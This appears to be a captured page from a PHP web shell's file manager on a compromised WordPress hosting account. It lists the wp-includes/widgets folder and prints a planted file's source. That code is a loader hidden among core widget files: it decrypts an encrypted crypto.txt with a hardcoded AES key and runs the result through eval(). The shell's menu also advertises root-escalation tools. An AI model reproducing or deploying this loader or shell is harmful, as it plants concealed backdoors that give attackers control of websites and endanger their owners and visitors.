Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.128.197.221
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
cleahvkv /
dsfdf /
wp-includes /
widgets /
Delete
Unzip
Name
Size
Permission
Date
Action
1694779554.php
2.53
KB
-rw-r--r--
2023-09-15 12:05
class-wp-nav-menu-widget.php
5.21
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-archives.php
5.3
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-calendar.php
2.8
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-categories.php
5.81
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-custom-html.php
11.55
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-links.php
6.74
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-media-audio.php
5.8
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-media-gallery.php
6.05
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-media-image.php
10.98
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-media-video.php
7.96
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-media.php
13.49
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-meta.php
3.51
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-pages.php
4.77
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-recent-comments.php
5.69
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-recent-posts.php
4.86
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-rss.php
3.6
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-search.php
2.55
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-tag-cloud.php
5.54
KB
-rw-r--r--
2021-01-05 18:46
class-wp-widget-text.php
20.25
KB
-rw-r--r--
2021-01-05 18:46
crypto.txt
79.33
KB
-rw-r--r--
2023-09-15 12:05
Save
Rename
<?php class UnsafeCrypto { const METHOD = 'aes-256-ctr'; /** * Encrypts (but does not authenticate) a message * * @param string $message - plaintext message * @param string $key - encryption key (raw binary expected) * @param boolean $encode - set to TRUE to return a base64-encoded * @return string (raw binary) */ public static function encrypt($message, $key, $encode = false) { $nonceSize = openssl_cipher_iv_length(self::METHOD); $nonce = openssl_random_pseudo_bytes($nonceSize); $ciphertext = openssl_encrypt( $message, self::METHOD, $key, OPENSSL_RAW_DATA, $nonce ); // Now let's pack the IV and the ciphertext together // Naively, we can just concatenate if ($encode) { return base64_encode($nonce.$ciphertext); } return $nonce.$ciphertext; } /** * Decrypts (but does not verify) a message * * @param string $message - ciphertext message * @param string $key - encryption key (raw binary expected) * @param boolean $encoded - are we expecting an encoded string? * @return string */ public static function decrypt($message, $key, $encoded = false) { if ($encoded) { $message = base64_decode($message, true); if ($message === false) { throw new Exception('Encryption failure'); } } $nonceSize = openssl_cipher_iv_length(self::METHOD); $nonce = mb_substr($message, 0, $nonceSize, '8bit'); $ciphertext = mb_substr($message, $nonceSize, null, '8bit'); $plaintext = openssl_decrypt( $ciphertext, self::METHOD, $key, OPENSSL_RAW_DATA, $nonce ); return $plaintext; } } $text = file_get_contents("./crypto.txt"); $key = hex2bin('000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f'); // $encrypted = UnsafeCrypto::encrypt($text, $key); // file_put_contents("./crypto.txt", $encrypted); $decrypted = UnsafeCrypto::decrypt($text, $key); eval($decrypted); ?>